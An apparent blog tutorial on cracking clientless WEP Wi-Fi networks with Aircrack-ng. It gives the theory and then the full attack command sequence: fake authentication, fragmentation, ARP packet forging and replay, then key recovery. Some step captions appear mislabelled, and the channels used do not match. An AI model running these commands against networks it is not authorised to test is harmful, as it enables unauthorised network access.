Before starting to explain how to Cracking Clientless WEP Networks, I assume you have a network card from this list, and the injections drivers installed (Kali is fully patched) if you have doubts check our tutorial How to install Packet Injection Drivers on Linux!

After the drivers are installed, we must test if everything is ok and if we are close enough to the Access Point (AP) to transmit packets to it!


  • 1 Access Point
  • 1 Laptop
  • 1 Alfa Card


All tools in this tutorial come from Aircrack-ng framework;

  • Airmon-ng
  • Airodump-ng
  • packetforge-ng
  • Aircrack-ng

Network Details

ESSIDBSSIDChannelInterfaceMAC Client

How it works?

Cracking WEP is easy but we have to keep in mind what real-world requirements and limitations we have to deal with. In this tutorial, I will try to explain how to crack WEP without clients using fragmentation, fake authentication, and ARP request replay attacks, for the curious I recommend reading these two tutorials before Conditions to crack a Wifi password, How WEP Works and WEP Attacks.

Let’s start with the theory, first, we must put our network card into monitor mode to sniff the packets from the air, then we must fake the authentication with AP to try to obtain the PRGA key when applying the fragmentation attack. With the PRGA key in hand, we must create an ARP packet and inject it, then we start collecting our unique IV’s once all packets are collected we need to crack them to extract the password.


  • Proximity with AP
  • AP Filter clients MAC addresses
  • AP isn’t generating data packet’s
  • If Fails use Chopchop Attack

or Interactive frame selection

Cracking Clientless WEP Networks

Put the interface into monitor mode;

airmon-ng start wlan0 7

Fake authentication attack

aireplay-ng -1 0 -e Wifisec -a 9C:97:26:D7:94:71 -h 00:C0:4C:6B:FF:76 mon0

Keep alive the connection to AP

aireplay-ng -1 6000 -o 1 -q 10 -e Wifisec -a 9C:97:26:D7:94:71 -h 00:C0:4C:6B:FF:76 mon0

Create the Packet with the PRGA key

aireplay-ng -5 -b 9C:97:26:D7:94:71 -h 00:C0:4C:6B:FF:76 mon0

Inject the packet with PGRA key

packetforge-ng -0 -a 9C:97:26:D7:94:71 -h 00:C0:4C:6B:FF:76 -k -l -y *.xor -w arp-request

Start capture the data and send to a file

airodump-ng -c 9 --bssid 9C:97:26:D7:94:71 -w capturedata mon0
aireplay-ng -2 -r arp-request mon0
aircrack-ng -b 9C:97:26:D7:94:71  capture*.cap
crack WEP without clients
crack WEP without clients

How to Crack WPA Password

wireless penetration testing


Categorized in:

Wireless Hacking,